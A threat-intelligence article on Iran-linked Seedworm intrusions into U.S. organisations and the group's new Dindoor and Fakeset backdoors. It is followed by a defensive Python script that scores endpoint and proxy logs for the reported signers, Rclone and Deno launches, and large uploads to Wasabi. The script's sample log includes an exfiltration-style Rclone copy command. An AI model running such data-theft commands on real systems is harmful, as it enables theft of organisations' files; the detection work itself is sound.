Iran-linked hackers, identified as the advanced persistent threat (APT) group Seedworm, have been discovered actively infiltrating the networks of multiple U.S. organizations since early February 2026. This intensified cyber threat activity follows recent coordinated military strikes against Iran, raising significant alarms within the cybersecurity community and highlighting a growing geopolitical tension manifesting in the digital realm. The group, also known by aliases such as MuddyWater and Static Kitten, is formally classified by CISA as a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS).
The surge in Seedworm’s operations appears directly linked to the escalation of regional conflict, suggesting Iran’s cyber operatives are leveraging the geopolitical climate as a catalyst for intrusions against American and allied targets. While Iran has engaged in conventional military responses, its cyber capabilities are evidently being deployed as a parallel strategy. Seedworm has been observed operating since at least 2017, and its targeting has expanded over time from primarily Middle Eastern entities to include critical sectors globally, such as telecommunications, defense contracting, local government, and energy organizations across continents.
Researchers at Symantec have identified specific instances of intrusion activities within the networks of a U.S. bank, a U.S. airport, a software company with significant ties to the defense and aerospace industries, and non-governmental organizations in both the United States and Canada. Notably, the Israeli operations of the software company appeared to be a primary focus, with Seedworm potentially exploiting the company’s global footprint as a pathway for lateral movement across its systems. These breaches were reportedly in progress prior to the formal commencement of military hostilities, indicating a sophisticated and pre-emptive positioning strategy by the group.
Further corroboration of Iran’s sustained cyber capabilities comes from the UK’s National Cyber Security Centre. The agency issued a formal alert indicating that Iranian state-aligned actors “almost certainly currently maintain at least some capability to conduct cyber activity,” even amidst disruptions to Iran’s own internet infrastructure. This highlights a critical aspect of modern cyber warfare: threat actors often operate from multiple jurisdictions, making domestic infrastructure issues less impactful on their global operational capacity. Evidence suggests that groups aligned with Iran’s interests, such as the hacktivist collective Handala, have been utilizing the Starlink satellite network for connectivity since mid-January 2026, predating an official Iranian government announcement of widespread internet disruptions.
Beyond Seedworm, other Iran-linked actors have demonstrably amplified their cyber campaigns. The pro-Palestinian hacktivist group DieNet, which emerged in early 2025, has claimed responsibility for distributed denial-of-service (DDoS) attacks targeting various U.S. critical infrastructure sectors, including energy, finance, healthcare, and transportation. Their methods have included TCP SYN floods, DNS amplification, and NTP amplification, contributing to a multifaceted threat landscape that combines state-sponsored espionage with disruptive hacktivist operations.
Seedworm’s Backdoor Deployment and Stealth Persistence
Seedworm’s latest operational repertoire includes the deployment of two newly identified backdoors: Dindoor and Fakeset. Dindoor is a previously unknown backdoor designed to execute via Deno, a secure runtime environment for JavaScript and TypeScript. This unconventional execution method allows Dindoor to evade detection by many standard security tools. The backdoor was discovered on the networks of the software company’s Israeli branch, a U.S. bank, and a Canadian non-profit. It was signed with a digital certificate issued to an entity named “Amy Cherne.”
Fakeset, a backdoor developed in Python, was deployed on the networks of the airport and the non-profit organization. Similar to Dindoor, it was signed using certificates attributed to “Amy Cherne” and “Donald Gay.” The “Donald Gay” certificate is significant, as it had been previously associated with other malware linked to Seedworm, thereby establishing a direct connection between this new activity and the group’s established threat infrastructure. The Stagecomp downloader, also signed with the “Donald Gay” certificate, was instrumental in delivering the Darkcomp backdoor, which has been formally linked to Seedworm by major cybersecurity firms and government agencies including Google, Microsoft, and Kaspersky.
During the intrusion into the software company, attackers also attempted to exfiltrate sensitive data using Rclone, a legitimate file-transfer utility that was repurposed for malicious purposes. The attackers reportedly aimed to transfer files to a Wasabi cloud storage bucket, though the success of this exfiltration attempt remains unconfirmed according to the available intelligence. The coordinated efforts of state-sponsored espionage and hacktivist-driven disruption present a complex and layered threat that requires comprehensive defensive strategies.
Organizations are advised to implement robust security measures to mitigate these evolving threats. This includes enforcing multi-factor authentication across all remote access points, diligently monitoring for anomalous outbound data transfers, and deploying web application firewalls with up-to-date rule sets. Restricting access to external cloud storage services and maintaining offline, immutable backups are crucial for ensuring rapid recovery capabilities following any potential destructive cyber attack. The ongoing geopolitical tensions suggest that cyber activity from Iran-linked actors will likely continue to be a significant concern for critical infrastructure and sensitive organizations globally.
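The monitoring advice above (watch for anomalous outbound transfers and for access to external cloud storage) maps directly onto the tradecraft the report describes: the "Amy Cherne" and "Donald Gay" signing certificates, Deno-hosted and Python backdoors, and Rclone pushing data to a Wasabi bucket. The script below is an added illustration, not code from Symantec or from the article, of how a defender might score those signals together over endpoint and proxy telemetry. The log line format, the hostnames and byte counts, the score weights, and the `wasabisys.com` endpoint suffix are all constructed or assumed for the example and should be replaced with your own schema and thresholds.

```python
"""Score constructed endpoint/proxy telemetry for the behaviours named in the
report: binaries signed by the reported certificate subjects, rclone and Deno
launches, and large outbound transfers to external object storage."""
import re
from dataclasses import dataclass, field

# Certificate subject names reported in the article.
SUSPECT_SIGNERS = {"amy cherne", "donald gay"}

# Tools named in the article. Deno is a legitimate runtime, so a launch alone
# is a weak signal and gets a low weight; rclone on an endpoint scores higher.
TOOL_WEIGHTS = {"rclone": 3, "deno": 1}

# Assumed Wasabi S3 endpoint domain; add the providers your organisation does
# not legitimately use. Threshold and weights are arbitrary starting points.
CLOUD_STORAGE_SUFFIXES = ("wasabisys.com",)
OUTBOUND_THRESHOLD_BYTES = 50 * 1024 * 1024  # 50 MiB per session
ALERT_THRESHOLD = 4

# Constructed line formats for this example, not a real product's schema.
PROCESS_RE = re.compile(
    r'^(?P<ts>\S+) proc host=(?P<host>\S+) image=(?P<image>\S+)'
    r'(?: signer="(?P<signer>[^"]*)")?(?: cmd="(?P<cmd>[^"]*)")?$'
)
NET_RE = re.compile(
    r'^(?P<ts>\S+) net host=(?P<host>\S+) dst=(?P<dst>\S+) bytes_out=(?P<bytes>\d+)$'
)

# Constructed sample telemetry: one host showing the full chain, one file
# server running rclone, and one developer box using Deno legitimately.
SAMPLE_LOG = [
    r'2026-02-12T08:01:03Z proc host=ws-17 image=C:\Users\j.doe\AppData\Local\Temp\update.exe signer="Amy Cherne"',
    r'2026-02-12T08:01:05Z proc host=ws-17 image=C:\Users\j.doe\.deno\bin\deno.exe cmd="deno run -A C:\Users\j.doe\AppData\Local\Temp\svc.ts"',
    r'2026-02-12T08:02:10Z net host=ws-17 dst=s3.us-east-1.wasabisys.com:443 bytes_out=734003200',
    r'2026-02-12T08:03:00Z proc host=srv-fs01 image=C:\Tools\rclone.exe cmd="rclone copy D:\shares\finance remote:bucket"',
    r'2026-02-12T08:03:30Z net host=srv-fs01 dst=s3.wasabisys.com:443 bytes_out=2147483648',
    r'2026-02-12T09:10:00Z proc host=dev-03 image=/usr/local/bin/deno cmd="deno run build.ts"',
    r'2026-02-12T09:11:00Z net host=dev-03 dst=registry.npmjs.org:443 bytes_out=10240',
]


@dataclass
class HostScore:
    score: int = 0
    reasons: list = field(default_factory=list)


def tool_name(path):
    """Basename of a Windows or POSIX path, lower-cased, without '.exe'."""
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def is_cloud_storage(dst):
    """True when the destination host is, or is a subdomain of, a watched suffix."""
    host = dst.rsplit(":", 1)[0].lower()
    return any(host == s or host.endswith("." + s) for s in CLOUD_STORAGE_SUFFIXES)


def triage(lines):
    """Accumulate a score and human-readable reasons per host."""
    scores = {}
    for line in lines:
        if m := PROCESS_RE.match(line):
            hs = scores.setdefault(m["host"], HostScore())
            if (m["signer"] or "").lower() in SUSPECT_SIGNERS:
                hs.score += 5
                hs.reasons.append(f"binary signed by reported subject '{m['signer']}'")
            tool = tool_name(m["image"])
            if tool in TOOL_WEIGHTS:
                hs.score += TOOL_WEIGHTS[tool]
                hs.reasons.append(f"{tool} launched: {m['cmd'] or m['image']}")
        elif m := NET_RE.match(line):
            hs = scores.setdefault(m["host"], HostScore())
            sent = int(m["bytes"])
            if is_cloud_storage(m["dst"]) and sent >= OUTBOUND_THRESHOLD_BYTES:
                hs.score += 4
                hs.reasons.append(f"{sent >> 20} MiB sent to {m['dst']}")
    return scores


def flagged_hosts(scores, threshold=ALERT_THRESHOLD):
    """Hosts whose accumulated score reaches the alert threshold, sorted."""
    return sorted(h for h, hs in scores.items() if hs.score >= threshold)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for host in flagged_hosts(results):
        print(f"{host}: score {results[host].score}")
        for reason in results[host].reasons:
            print(f"  - {reason}")
```

Run as-is, the workstation with the suspicious signer, a Deno launch from a temp directory and a large Wasabi upload scores highest, the file server running rclone is flagged on the transfer alone, and the developer host using Deno against a package registry stays below the threshold. Scoring across signals rather than alerting on any single one is what keeps a legitimate Deno install from drowning the queue while still surfacing the combination the report describes.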